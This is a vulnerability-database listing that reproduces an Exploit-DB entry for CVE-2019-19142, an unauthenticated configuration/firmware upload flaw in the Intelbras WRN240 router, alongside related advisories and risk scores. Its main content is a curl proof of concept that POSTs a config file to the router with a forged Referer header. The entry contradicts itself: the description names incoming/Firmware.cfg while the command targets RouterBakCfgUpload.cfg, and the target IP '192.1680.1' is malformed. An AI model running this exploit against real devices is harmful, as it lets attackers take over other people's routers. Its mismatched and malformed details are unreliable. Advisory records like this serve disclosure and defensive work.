Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Intelbras Wireless N 150Mbps WRN240 - Authentication Bypass (Config Upload)

🗓️ 02 Mar 2020 00:00:00Reported by Elber TavaresType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 167 Views

Intelbras WRN240 allows firmware upload without authentication, posing security risk.

Related
Code
ReporterTitlePublishedViews
Family
0day.today		Intelbras Wireless N 150Mbps WRN240 - Authentication Bypass (Config Upload) Vulnerability
2 Mar 202000:00
zdt
CNVD		Unspecified Vulnerability in Intelbras WRN240
19 Jan 202000:00
cnvd
Check Point Advisories		Intelbras Wireless N Authentication Bypass (CVE-2019-19142)
21 Nov 202000:00
checkpoint_advisories
CVE		CVE-2019-19142
17 Jan 202001:29
cve
Cvelist		CVE-2019-19142
17 Jan 202001:29
cvelist
exploitpack		Intelbras Wireless N 150Mbps WRN240 - Authentication Bypass (Config Upload)
2 Mar 202000:00
exploitpack
NVD		CVE-2019-19142
17 Jan 202002:15
nvd
OSV		CVE-2019-19142
17 Jan 202002:15
osv
Packet Storm		Intelbras Wireless N 150Mbps WRN240 Authentication Bypass
2 Mar 202000:00
packetstorm
Prion		Authentication flaw
17 Jan 202002:15
prion
Rows per page
# Exploit Title: Intelbras Wireless N 150Mbps WRN240 - Authentication Bypass (Config Upload)
# Date: 2019-11-20
# Exploit Author: Elber Tavares
# Vendor Homepage:  https://www.intelbras.com/
# Software Link:  http://en.intelbras.com.br/node/1033
# Version: Intelbras Wireless N 150Mbps - WRN240
# Tested on: linux, windows
# CVE: CVE-2019-19142

Intelbras WRN240 devices do not require authentication to replace the
firmware via a POST request to the incoming/Firmware.cfg URI.

REFS:
 https://fireshellsecurity.team/hack-n-routers/
 https://github.com/ElberTavares/routers-exploit/


Poc:
curl -i -X POST -H "Content-Type: multipart/form-data" -H "Referer:
http://192.168.0.1/userRpm/BakNRestoreRpm.htm" -F [email protected]
http://192.1680.1/incoming/RouterBakCfgUpload.cfg

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
02 Mar 2020 00:00Current
7.6High risk
Vulners AI Score7.6
CVSS 25
CVSS 3.17.5
EPSS0.0781
intelbras wrn240authentication bypassfirmware upload vulnerabilitycve-2019-19142security exploit
167